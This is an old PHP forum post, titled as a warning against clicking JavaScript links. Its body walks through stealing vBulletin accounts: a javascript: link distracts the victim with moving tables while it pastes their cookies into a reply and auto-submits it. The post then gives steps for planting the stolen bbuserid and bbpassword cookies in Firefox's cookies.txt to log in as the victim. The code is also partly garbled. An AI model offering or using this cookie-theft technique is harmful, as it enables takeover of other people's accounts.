TalkPHP
 
 
Account Login
Latest Articles
» The basic usage of PHPTAL, a XML/XHTML template library for PHP
» Vulnerable methods and the areas they are commonly trusted in.
» Simple way to protect a form from bot
» The Basics On: How Session Stealing Works
» How to keep your forms from double posting data
IRC Channel
IRC Speech Bubble Join the friendly bunch on IRC...
(#TalkPHP on Freenode)

...Also available via a web interface.

See this thread for information on the TalkPHP Free Hugs Initiative™. Subject to availability.
Associates
Associates
CSS Tutorials
 
 
LinkBack Thread Tools Search this Thread Display Modes
Prev Previous Post   Next Post Next
Old 10-29-2007, 02:14 AM   #1 (permalink)
Wizard
Top Contributor 
 
Village Idiot's Avatar
 
Join Date: Sep 2007
Posts: 1,299
Thanks: 17
Village Idiot is on a distinguished road
Default Never visit JS links on a forum, here is why

This sequence of things will allow you to hack a users account, with a little practice I was able to do it in about half a minute.

Step one: Make a thread like this one, it looks innocent (the code in that is), but use this code instead (WARNING: VISITING THIS WILL COMPROMISE YOUR ACCOUNT SECURITY).
PHP Code:
javascript:R=0x1=.1y1=.05x2=.25y2=.24x3=1.6y3=.24x4=300y4=200x5=300y5=200DI=document.getElementsByTagName("table"); DIL=DI.length; function A(){for(i=0i-DILi++){DIS=DI].styleDIS.position='absolute'DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}document.getElementById('vB_Editor_QR_textarea').value=document.cookie;document.getElementById('qr_submit').click();setInterval('A()',50); void(0); 
This code will print out all their cookies from this site.

Step 2:
You wait till some sucker runs the javascript, check often. When it gets posted, copy the text on notepad (not wordpad to remove all formatting) and close firefox

Step 3: If you use firefox, go to [Drive Letter]:\Documents and Settings\[User Name]\Application Data\Mozilla\Firefox\Profiles\[profile name]

Step 4: Edit the following values in cookies.txt with the ones on the notepad window (from the forum site, of course)
bbpassword
bbuserid

Save and close window, re-open firefox and you will be logged into their account.

I am working on a video for this, I will post it if I get it.

Last edited by Village Idiot : 10-29-2007 at 07:24 PM.
Village Idiot is offline  
 



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 02:32 AM.

 
     

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.1.0
Inactive Reminders By Icora Web Design